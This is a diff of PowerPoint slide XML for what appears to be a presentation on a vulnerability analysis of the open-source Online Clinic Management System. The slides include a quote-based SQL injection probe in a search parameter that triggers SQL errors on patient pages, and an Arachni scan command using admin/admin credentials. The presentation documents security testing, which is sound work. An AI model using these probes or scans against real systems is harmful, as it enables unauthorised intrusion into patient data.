-              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>SQL injection: </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" b="1" u="sng" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" u="sng" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Authenticated Automatic Scan</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" b="1" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900">
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>GET Request  from </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>patient_prescription.php</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> with parameter</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>‘search=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>vega</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>’”’</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Output Result </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t> SQL syntax error message</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t>2. Same output results for </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t>patient_diagnosis.php</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t> and </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t>patient_history.php</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1744150631"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735979F9-1635-4730-AF58-2D0FD3B2447D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2231136" y="123118"/>
-            <a:ext cx="7729728" cy="641992"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1"/>
-              <a:t>Arachni</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t> report</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B982AA0-010D-4BCE-A2EB-63252EF5FE5D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="246266" y="949203"/>
-            <a:ext cx="11699468" cy="5507580"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>CLI command : </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1"/>
-              <a:t>arachni</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t> http://www.arafat.com/ocms --http-authentication-type basic --http-authentication-username admin --http-authentication-password admin --report-save-path=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1"/>
-              <a:t>arafat.com.afr</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="4" name="Picture 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00C2161B-7D05-43EA-BF1F-F83B377F8B75}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1525547" y="1747856"/>
-            <a:ext cx="9682081" cy="4817115"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="655257166"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide10.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -5397,7 +3997,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -5626,6 +4226,1889 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{248B44EC-8DE9-4469-B312-ECA0F011736E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2231136" y="704633"/>
+            <a:ext cx="7729728" cy="1188720"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Sqli</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> scenario</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C20284C-5FD5-425F-AE55-DABA4DBEAD08}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="856800991"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35BA177A-BE57-48A6-B01B-892FF5DD5585}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2231136" y="1878008"/>
+            <a:ext cx="7729728" cy="3101983"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0" algn="ctr">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0" algn="ctr">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0"/>
+              <a:t>Thank You !</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0" algn="ctr">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0" algn="ctr">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0"/>
+              <a:t>Any Questions ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="670303188"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FD05CA-2433-498B-BAE8-815C0650423E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="ctrTitle"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Vulnerability Analysis of an open-source Web Application</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Subtitle 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D9CB6B-7603-4FEE-81C8-0E6E909D3367}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="subTitle" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1600200" y="4357818"/>
+            <a:ext cx="9144000" cy="1655762"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
+              <a:t>(Online Clinic Management System)</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4200200636"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC9F094A-8790-4D6C-9AE8-0DB083285CC7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1828800" y="771745"/>
+            <a:ext cx="7930728" cy="1283558"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Online Clinic Management System</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9404471-C1EA-40D3-B247-ADB43E694C35}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1828800" y="2638044"/>
+            <a:ext cx="8132064" cy="3586587"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>OCMS is a web application to manage your clinic.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>License </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t> MIT License</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t>Requires PHP and MySQL</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Latest version: OCMS version 2.21, released on June 12, 2017</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>generated using AppGini 5.62 </a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387120253"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:solidFill>
+          <a:schemeClr val="bg1"/>
+        </a:solidFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Rectangle 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AEFFFF2-9EB4-4B6C-B9F8-2BA3EF89A21C}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1" y="0"/>
+            <a:ext cx="3070172" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:schemeClr val="tx2"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp useBgFill="1">
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="Rectangle 9">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D65299F-028F-4AFC-B46A-8DB33E20FE4A}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3070172" y="0"/>
+            <a:ext cx="9121828" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
